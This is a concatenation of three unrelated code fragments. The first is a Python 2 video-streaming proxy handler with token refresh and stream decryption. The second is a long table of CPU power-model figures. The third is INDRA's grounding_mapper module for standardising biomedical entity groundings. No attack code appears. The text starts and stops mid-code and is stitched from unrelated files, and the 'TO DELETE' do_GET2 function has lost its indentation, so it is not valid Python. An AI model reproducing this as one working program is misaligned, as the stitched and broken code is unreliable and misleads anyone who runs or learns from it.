            # self.send_header('Content-Length',response.info().getheader('Content-Length'))
            self.send_header('Cache-Control',response.info().getheader('Cache-Control'))
            self.send_header('Date',response.info().getheader('Date'))
            self.send_header('Content-type','video/mp4')
            self.send_header('Accept-Ranges','bytes')
            #self.send_header('ETag',response.info().getheader('ETag'))
            #self.send_header('Server',response.info().getheader('Server'))
            self.end_headers()

            ## may want to add more granular control over chunk fetches
            #self.wfile.write(response.read())

            if (self.server.crypto):
                # Encrypted stream: decrypt while relaying to the player.
                self.server.service.settings.setCryptoParameters()
                from resources.lib import encryption
                decrypt = encryption.encryption(self.server.service.settings.cryptoSalt,self.server.service.settings.cryptoPassword)
                CHUNK = 16 * 1024
                decrypt.decryptStreamChunk(response,self.wfile, startOffset=startOffset)
            else:
                # Plain stream: relay in 16 KB chunks.
                CHUNK = 16 * 1024
                while True:
                    chunk = response.read(CHUNK)
                    if not chunk:
                        break
                    self.wfile.write(chunk)

            #response_data = response.read()
            response.close()
            print "DONE"

        # redirect url to output
        elif self.path == '/playx':
            # Unranged variant of /play: always a full 200 response.
            # if (self.server.crypto and start != '' and end == ''):
            #     #start = start - (16 - (end % 16))
            #     print "START = " + str(start)
            #     start = start - (16-(( int(self.server.length) - start) % 16) )

            # if (self.server.crypto and start == 23474184 ):
                #start = start - (16 - (end % 16))
            #     start = 23474184 - 8

            url = self.server.playbackURL
            print 'GET ' + url + "\n" + self.server.service.getHeadersEncoded() + "\n"

            req = urllib2.Request(url, None, self.server.service.getHeadersList())
            try:
                response = urllib2.urlopen(req)
            except urllib2.URLError, e:
                # 401/403: refresh the OAuth token and retry exactly once.
                if e.code == 403 or e.code == 401:
                    print "ERROR\n" + self.server.service.getHeadersEncoded()
                    self.server.service.refreshToken()
                    req = urllib2.Request(url, None, self.server.service.getHeadersList())
                    try:
                        response = urllib2.urlopen(req)
                    except:
                        print "STILL ERROR\n" + self.server.service.getHeadersEncoded()
                        return
                else:
                    return

            self.send_response(200)
            self.send_header('Content-Length',response.info().getheader('Content-Length'))
            print str(response.info()) + "\n"
            self.send_header('Content-Type',response.info().getheader('Content-Type'))
            # self.send_header('Content-Length',response.info().getheader('Content-Length'))
            self.send_header('Cache-Control',response.info().getheader('Cache-Control'))
            self.send_header('Date',response.info().getheader('Date'))
            self.send_header('Content-type','video/mp4')
            # self.send_header('Accept-Ranges','bytes')
            #self.send_header('ETag',response.info().getheader('ETag'))
            #self.send_header('Server',response.info().getheader('Server'))
            self.end_headers()

            ## may want to add more granular control over chunk fetches
            #self.wfile.write(response.read())

            if (self.server.crypto):
                # Encrypted stream: decrypt while relaying; the fixed 16
                # here skips the stream header -- TODO confirm against
                # encryption.decryptStreamChunk.
                self.server.service.settings.setCryptoParameters()
                from resources.lib import encryption
                decrypt = encryption.encryption(self.server.service.settings.cryptoSalt,self.server.service.settings.cryptoPassword)
                CHUNK = 16 * 1024
                decrypt.decryptStreamChunk(response,self.wfile, 16)
            else:
                # Plain stream: relay in 16 KB chunks.
                CHUNK = 16 * 1024
                while True:
                    chunk = response.read(CHUNK)
                    if not chunk:
                        break
                    self.wfile.write(chunk)

            #response_data = response.read()
            response.close()
            print "DONE"

        # redirect url to output
        else:
            url = str(self.server.domain) + str(self.path)
            print 'GET ' + url + "\n"
#TO DELETE
def do_GET2(self):
# passed a kill signal?
if self.path == '/kill':
self.server.ready = False
return
# debug - print headers in log
headers = str(self.headers)
print(headers)
# client passed a range of bytes to fetch
start = ''
end = ''
count = 0
for r in re.finditer('Range\:\s+bytes\=(\d+)\-' ,
headers, re.DOTALL):
start = int(r.group(1))
break
for r in re.finditer('Range\:\s+bytes\=\d+\-(\d+)' ,
headers, re.DOTALL):
end = int(r.group(1))
if end == 0:
end = ''
break
# pass back the appropriate headers
if start == '':
self.send_response(200)
self.send_header('Content-Length',self.server.fileSize)
else:
self.send_response(206)
if start > 0:
count = int(start/int(self.server.chunksize))
self.send_header('Content-Length',str(self.server.fileSize-(count*int(self.server.chunksize))))
self.send_header('Content-Range','bytes ' + str(start) + '-' + str(self.server.fileSize-1)+'/'+str(self.server.fileSize))
req = urllib2.Request(self.server.url, None, self.server.service.getHeadersList(additionalHeader='Range', additionalValue='bytes '+ str(start) + '-' + str(end)))
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
print "error " + str(e.code) + ' header Range' + str(start) + '-' + str(end)
self.server.service.refreshToken()
req = urllib2.Request(self.server.url, None, self.server.service.getHeadersList(additionalHeader='Range', additionalValue='bytes '+ str(start) + '-' + str(end)))
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
print "error " + str(e.code)
return
self.send_header('Content-type','video/mp4')
self.send_header('Accept-Ranges','bytes')
self.end_headers()
#while self.server.state == 2:
# self.server.state = 3
#while self.server.state == 3:
# xbmc.sleep(10)
# is streamer ready to serve packets?
if self.server.state == 0:
## fetch the entire stream?
#self.server.state = 2
#try:
if count == 0:
with open(self.server.playbackURL, "rb") as f:
while True:
chunk = f.read(self.server.chunksize)
if chunk:
self.wfile.write(chunk)
count = count + 1
else:
break
f.close()
#fi = open(self.server.playbackFile, 'ab')
#self.server.state = 1
if self.server.lock != 0:
| |
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.290779,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.64553,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.00473762,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.206409,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0217634,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.185392,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.299031,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.150941,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.635364,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.208698,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.2718,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.00411157,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00777619,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0581606,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0575097,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0622721,
'Execution Unit/Register Files/Runtime Dynamic': 0.0652859,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.123713,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.326125,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.63856,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0021259,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0021259,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00190562,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000767217,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000826131,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00698355,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0184546,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0552855,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.51664,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.221291,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.187775,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.90582,
'Instruction Fetch Unit/Runtime Dynamic': 0.48979,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0470964,
'L2/Runtime Dynamic': 0.009502,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.95098,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.830005,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0554475,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0554476,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.21282,
'Load Store Unit/Runtime Dynamic': 1.1589,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.136724,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.273449,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0485238,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0490485,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.218651,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0368184,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.458116,
'Memory Management Unit/Runtime Dynamic': 0.0858669,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.4851,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0108162,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00849602,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0948037,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming | |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import csv
import sys
import pickle
from copy import deepcopy
from indra.databases import uniprot_client, hgnc_client
from itertools import groupby, chain
from collections import Counter
import logging
from indra.util import read_unicode_csv, write_unicode_csv
logger = logging.getLogger('grounding_mapper')
class GroundingMapper(object):
    """Standardizes Agent groundings in Statements using a grounding map.

    The grounding map ``gm`` is a dict keyed by agent text (the 'TEXT'
    entry of an Agent's db_refs). Each value is either a db_refs dict to
    assign to agents carrying that text, or None, which marks the text as
    ungroundable so that statements containing it are filtered out by
    ``map_agents``.
    """
    def __init__(self, gm):
        # gm: dict mapping agent text -> db_refs dict, or None (filter out)
        self.gm = gm
    def map_agents(self, stmts, do_rename=True):
        """Return a copy of ``stmts`` with agent groundings mapped.

        Statements whose agent text maps to None in the grounding map are
        dropped (and counted in the log message). When ``do_rename`` is
        True, mapped agents are also renamed, preferring the Bioentities
        ('BE') entry, then the HGNC symbol, then the Uniprot gene name.

        Raises ValueError when the grounding map contains an HGNC symbol
        with no HGNC ID, or a Uniprot ID whose gene name is missing or
        inconsistent with the given HGNC symbol.
        """
        # Make a copy of the stmts
        mapped_stmts = []
        num_skipped = 0
        # Iterate over the statements
        for stmt in stmts:
            mapped_stmt = deepcopy(stmt)
            # Iterate over the agents
            skip_stmt = False
            for agent in mapped_stmt.agent_list():
                if agent is None or agent.db_refs.get('TEXT') is None:
                    continue
                agent_text = agent.db_refs.get('TEXT')
                # Look this string up in the grounding map
                # If not in the map, leave agent alone and continue
                try:
                    map_db_refs = self.gm[agent_text]
                except KeyError:
                    continue
                # If it's in the map but it maps to None, then filter out
                # this statement by skipping it
                if map_db_refs is None:
                    # Increase counter if this statement has not already
                    # been skipped via another agent
                    if not skip_stmt:
                        num_skipped += 1
                        logger.debug("Skipping %s" % agent_text)
                    skip_stmt = True
                # If it has a value that's not None, map it and add it
                else:
                    # Otherwise, update the agent's db_refs field
                    gene_name = None
                    map_db_refs = deepcopy(self.gm.get(agent_text))
                    up_id = map_db_refs.get('UP')
                    hgnc_sym = map_db_refs.get('HGNC')
                    if up_id and not hgnc_sym:
                        # NOTE(review): second positional arg presumably
                        # disables web fallback (keyword form used in
                        # rename_agents) — confirm against
                        # uniprot_client.get_gene_name's signature
                        gene_name = uniprot_client.get_gene_name(up_id, False)
                        if gene_name:
                            hgnc_id = hgnc_client.get_hgnc_id(gene_name)
                            if hgnc_id:
                                map_db_refs['HGNC'] = hgnc_id
                    elif hgnc_sym and not up_id:
                        # Override the HGNC symbol entry from the grounding
                        # map with an HGNC ID
                        hgnc_id = hgnc_client.get_hgnc_id(hgnc_sym)
                        if hgnc_id:
                            map_db_refs['HGNC'] = hgnc_id
                            # Now get the Uniprot ID for the gene
                            up_id = hgnc_client.get_uniprot_id(hgnc_id)
                            if up_id:
                                map_db_refs['UP'] = up_id
                        # If there's no HGNC ID for this symbol, raise an
                        # Exception
                        else:
                            raise ValueError('No HGNC ID corresponding to gene '
                                             'symbol %s in grounding map.' %
                                             hgnc_sym)
                    # If we have both, check the gene symbol ID against the
                    # mapping from Uniprot
                    elif up_id and hgnc_sym:
                        # Get HGNC Symbol from Uniprot
                        gene_name = uniprot_client.get_gene_name(up_id)
                        if not gene_name:
                            raise ValueError('No gene name found for Uniprot '
                                             'ID %s (expected %s)' %
                                             (up_id, hgnc_sym))
                        # We got gene name, compare it to the HGNC name
                        else:
                            if gene_name != hgnc_sym:
                                raise ValueError('Gene name %s for Uniprot ID '
                                                 '%s does not match HGNC '
                                                 'symbol %s given in grounding '
                                                 'map.' %
                                                 (gene_name, up_id, hgnc_sym))
                            else:
                                hgnc_id = hgnc_client.get_hgnc_id(hgnc_sym)
                                if not hgnc_id:
                                    raise ValueError('No HGNC ID '
                                                     'corresponding to gene '
                                                     'symbol %s in grounding '
                                                     'map.' % hgnc_sym)
                    # Assign the DB refs from the grounding map to the agent
                    agent.db_refs = map_db_refs
                    # Are we renaming right now?
                    if do_rename:
                        # If there's a Bioentities ID, prefer that for the name
                        if agent.db_refs.get('BE'):
                            agent.name = agent.db_refs.get('BE')
                        # Get the HGNC symbol or gene name (retrieved above)
                        elif hgnc_sym is not None:
                            agent.name = hgnc_sym
                        elif gene_name is not None:
                            agent.name = gene_name
            # Check if we should skip the statement
            if not skip_stmt:
                mapped_stmts.append(mapped_stmt)
        logger.info('%s statements filtered out' % num_skipped)
        return mapped_stmts
    def rename_agents(self, stmts):
        """Return a deep copy of ``stmts`` with agents renamed.

        Preference order for the new name: the Bioentities ('BE') entry,
        then the Uniprot gene name (which also back-fills the 'HGNC'
        db_refs entry when an HGNC ID exists for that gene name).
        Agents with neither grounding keep their current name.
        """
        # Make a copy of the stmts
        mapped_stmts = deepcopy(stmts)
        # Iterate over the statements
        for stmt_ix, stmt in enumerate(mapped_stmts):
            # Iterate over the agents
            for agent in stmt.agent_list():
                if agent is None:
                    continue
                # NOTE(review): old_name is assigned but never used
                old_name = agent.name
                # If there's a Bioentities ID, prefer that for the name
                if agent.db_refs.get('BE'):
                    agent.name = agent.db_refs.get('BE')
                # Take a HGNC name from Uniprot next
                elif agent.db_refs.get('UP'):
                    # Try for the gene name
                    gene_name = uniprot_client.get_gene_name(
                        agent.db_refs.get('UP'),
                        web_fallback=False)
                    if gene_name:
                        agent.name = gene_name
                        hgnc_id = hgnc_client.get_hgnc_id(gene_name)
                        if hgnc_id:
                            agent.db_refs['HGNC'] = hgnc_id
                    # Take the text string
                    #if agent.db_refs.get('TEXT'):
                    #    agent.name = agent.db_refs.get('TEXT')
                    # If this fails, then we continue with no change
                # Fall back to the text string
                #elif agent.db_refs.get('TEXT'):
                #    agent.name = agent.db_refs.get('TEXT')
        return mapped_stmts
# TODO: handle the cases when there is more than one entry for the same
# key (e.g., ROS, ER)
def load_grounding_map(grounding_map_path, ignore_path=None):
    """Load a grounding map from a CSV file.

    Each row starts with the agent text, followed by alternating
    database-name/ID column pairs. Rows with no database entries map the
    text to None (meaning: statements grounded only by this text should
    be filtered out). Rows from the optional file at *ignore_path* are
    appended after the rows from the main file, so later rows overwrite
    earlier rows with the same text key.

    Returns a dict mapping agent text to a db_refs dict (which includes
    the 'TEXT' key) or to None.
    """
    g_map = {}
    map_rows = read_unicode_csv(grounding_map_path, delimiter=',',
                                quotechar='"',
                                quoting=csv.QUOTE_MINIMAL,
                                lineterminator='\r\n')
    if ignore_path and os.path.exists(ignore_path):
        ignore_rows = read_unicode_csv(ignore_path, delimiter=',',
                                       quotechar='"',
                                       quoting=csv.QUOTE_MINIMAL,
                                       lineterminator='\r\n')
    else:
        ignore_rows = []
    for row in chain(map_rows, ignore_rows):
        key = row[0]
        db_refs = {'TEXT': key}
        # Odd-indexed columns are database names, even-indexed are IDs
        keys = [entry for entry in row[1::2] if entry != '']
        values = [entry for entry in row[2::2] if entry != '']
        if len(keys) != len(values):
            # Was logged at INFO level with an 'ERROR:' prefix; use the
            # error level since the row is being dropped.
            logger.error('Mismatched keys and values in row %s' % str(row))
            continue
        db_refs.update(dict(zip(keys, values)))
        if len(db_refs) > 1:
            g_map[key] = db_refs
        else:
            # No grounding beyond TEXT: mark the text as ungroundable
            g_map[key] = None
    return g_map
# Some useful functions for analyzing the grounding of sets of statements
# Put together all agent texts along with their grounding
def all_agents(stmts):
    """Collect every agent in *stmts* that carries a 'TEXT' db_refs entry.

    Agents that are None, or that lack a 'TEXT' entry (e.g. agents from
    database-derived Statements), are excluded.
    """
    collected = []
    for statement in stmts:
        for ag in statement.agent_list():
            if ag is None:
                continue
            if ag.db_refs.get('TEXT') is None:
                continue
            collected.append(ag)
    return collected
def agent_texts(agents):
    """Return the raw text entry (the 'TEXT' db_refs key) of each agent.

    Agents without a 'TEXT' entry contribute None to the result.
    """
    return [agent.db_refs.get('TEXT') for agent in agents]
def get_sentences_for_agent(text, stmts, max_sentences=None):
    """Collect (pmid, sentence) pairs for statements mentioning *text*.

    One pair (taken from the statement's first evidence) is appended per
    agent whose 'TEXT' db_refs entry equals *text*; collection stops as
    soon as *max_sentences* pairs have been gathered, if given.
    """
    collected = []
    for stmt in stmts:
        for ag in stmt.agent_list():
            if ag is None or ag.db_refs.get('TEXT') != text:
                continue
            first_ev = stmt.evidence[0]
            collected.append((first_ev.pmid, first_ev.text))
            if max_sentences is not None and len(collected) >= max_sentences:
                return collected
    return collected
def agent_texts_with_grounding(stmts):
    """Tabulate each agent text with its groundings and their frequencies.

    Returns a list of tuples
    ``(text, ((db, id, count), ...), total_count)`` sorted by
    ``total_count`` in descending order; within each text, the
    ``(db, id, count)`` groundings are sorted by count in descending
    order, and an entry ``(None, None, count)`` records occurrences with
    no grounding beyond 'TEXT'.

    NOTE(review): mutates the input in place — any 'PFAM-DEF' list in an
    agent's db_refs is converted to a tuple so it can be hashed.
    """
    allag = all_agents(stmts)
    # Convert PFAM-DEF lists into tuples so that they are hashable and can
    # be tabulated with a Counter
    for ag in allag:
        pfam_def = ag.db_refs.get('PFAM-DEF')
        if pfam_def is not None:
            ag.db_refs['PFAM-DEF'] = tuple(pfam_def)
    # Count each distinct full db_refs dict (as a hashable tuple of items)
    refs = [tuple(ag.db_refs.items()) for ag in allag]
    refs_counter = Counter(refs)
    refs_counter_dict = [(dict(entry[0]), entry[1])
                         for entry in refs_counter.items()]
    # First, sort by text so that we can do a groupby
    # (groupby only merges consecutive entries with equal keys)
    refs_counter_dict.sort(key=lambda x: x[0].get('TEXT'))
    # Then group by text
    grouped_by_text = []
    for k, g in groupby(refs_counter_dict, key=lambda x: x[0].get('TEXT')):
        # Total occurrences of this agent text
        total = 0
        entry = [k]
        db_ref_list = []
        for db_refs, count in g:
